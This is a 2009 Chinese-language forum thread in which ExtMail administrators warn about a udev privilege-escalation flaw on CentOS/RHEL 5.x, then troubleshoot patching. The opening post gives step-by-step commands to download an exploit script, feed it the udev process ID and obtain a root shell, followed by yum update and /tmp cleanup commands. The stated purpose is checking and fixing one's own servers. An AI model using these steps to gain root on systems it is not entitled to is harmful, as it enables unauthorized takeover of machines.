最近闹的很凶的linux udev漏洞对2.6系列的CentOS/RHEL 5.x（除了5.3）都有效，而对2.4系列的则无效，对于CentOS/RHEL 4.x 经过测试，按本文攻击方法无效，但是否真的无效还有待真正高手验证！请大家必须打起12分精神。赶紧升级。ExtMail团队已经将所有我们掌控的Linux服务器（2.6 kernel，5.x 系列）全部升级完毕。以下是检测方法和升级方法，请路过使用受影响的linux系统的朋友一定要参考并升级，否则很容易出问题。这次可以通过任意web程序来实现攻击，而且成功率几乎100%。

请看过此帖的朋友帮忙顶一下帖，今天测了好几个服务器都有这个问题，全都修复了。

检测方法：

引用:

1）下载攻击脚本：
wget http://www.extmail.org/source/exploit-udev-8478

2）获得udev进程号
执行：ps ax|grep udev|grep -v grep|awk {'print $1'} 获得udev进程号，然后将此数字减1作为
exploit-udev-8478的参数，例如命令结果为143则参数为142

3）执行：
sh exploit-udev-8478 142
suid.c: In function ‘main’:
suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’
sh-3.1#
然后id 看看：
uid=0(root) gid=0(root) groups=65530(hzqbbc)

顺利获得root权限，如果无法获得root权限，要多执行脚本几次，一般第二次即可获得root权限。

解决/预防方法

唯一的就是要立刻升级udev软件包，此软件包升级后不需要重启动。方法很简单，请升级对应版本的官方最新udev，尤其要注意查看是否将这个漏洞补掉，EMOS用户可以很简单的用yum升级：

yum update udev

升级完毕后再用检测方法检测一遍以确保没有问题！强烈建议再重新做检测时，执行以下命令清除掉上一次入侵成功的临时文件，否则升级完也会攻击成功的。

以root权限执行：

引用:

rm -rf /tmp/libno_ex*
rm -rf /tmp/suid
rm -rf /tmp/udev

直接贴出攻击方法是否不合适啊？

还有升级到多少版块可以去除这个漏洞？

引用:

Package                 Arch       Version          Repository        Size
=============================================================================
Updating:
udev                    i386       039-10.22.el4_7.1  updates           845 k

Transaction Summary
=============================================================================
Install      0 Package(s)         
Update       1 Package(s)         
Remove       0 Package(s)         
Total download size: 845 k
Is this ok [y/N]: y

[ 本帖最后由 arbor 于 2009-5-3 12:02 编辑 ]

这个攻击方法满大街都有的。不贴也可以搜索得到。目前升级到udev-095-14.20.el5_3是没问题的

我升级完了 咋还不行啊。。。。

谢谢啊！全部升级完毕！

光升级这个udev是不是还没有用啊  还需要升级其它的？

无法更新，请指点！

Setting up Update Process
Setting up repositories
ftp://emos:linuxfly@emos.linuxfl ... epodata/repomd.xml: [Errno 4] IOError: [Errno ftp error] (111, 'Connection refused')
Trying other mirror.
Cannot open/read repomd.xml file for repository: EMOS-OS
failure: repodata/repomd.xml from EMOS-OS: [Errno 256] No more mirrors to try.
Error: failure: repodata/repomd.xml from EMOS-OS: [Errno 256] No more mirrors to try.

引用:

原帖由 hzqbbc 于 2009-5-3 11:43 发表
最近闹的很凶的linux udev漏洞对2.6系列的核心都有效，而对2.4系列的则无效。请大家必须打起12分精神。赶紧升级。ExtMail团队已经将所有我们掌控的Linux服务器（2.6 kernel）全部升级完毕。以下是检测方法和升级方法，请路过 ...

EMOS直接yum update udev出现如下错误：

ftp://emos:linuxfly@emos.linuxfl ... epodata/repomd.xml: [Errno 4] IOError: [Errno ftp error] (111, 'Connection refused')
Trying other mirror.
Cannot open/read repomd.xml file for repository: EMOS-OS
failure: repodata/repomd.xml from EMOS-OS: [Errno 256] No more mirrors to try.
Error: failure: repodata/repomd.xml from EMOS-OS: [Errno 256] No more mirrors to try.

而且楼主说的udev-095-14.20.el5_3.i386.rpm  是基于CentOS5.x的吧，EMOS 是4.6的，要升级到哪个版本啊

[ 本帖最后由 jgh2008 于 2009-5-3 17:04 编辑 ]

建议上http://centos.ustc.ued.cn 更新源。linuxfly这里只提供emos的。

偶的机器是FreeBSD的，看来可以飘过了

有源码包吗，在哪里下载啊，我是AS4系统

EMOS 1.3.0 安装的extmail 只升级了extmail到1.0.8  extman到1.0.1

测试的时候报下面的错。

exploit-udev-8478: line 106: gcc: command not found
exploit-udev-8478: line 122: gcc: command not found
exploit-udev-8478: line 123: gcc: command not found
exploit-udev-8478: line 129: gcc: command not found
cp: cannot stat `libno_ex.so.1.0': No such file or directory
exploit-udev-8478: line 131: /tmp/udev: No such file or directory


目前版本是：Release: 10.19.el4
网上4.6的版本：Release: 10.22.el4_7.1 而且是08年的
看来CentOS 4.6的没有必要更新了吧。还是攻击脚本是针对5.X的CentOS？

楼上的，你安装1.3版本的时候没有选择安装开发工具，选择安装后就能提升权限了。

引用:

原帖由 hzqbbc 于 2009-5-3 16:51 发表
建议上http://centos.ustc.ued.cn 更新源。linuxfly这里只提供emos的。

管理员请协助解决，EMSO1.3　平台下的漏洞修补。http://centos.ustc.ued.cn/　没有找到啊

centos 4.6 下UDEV的升级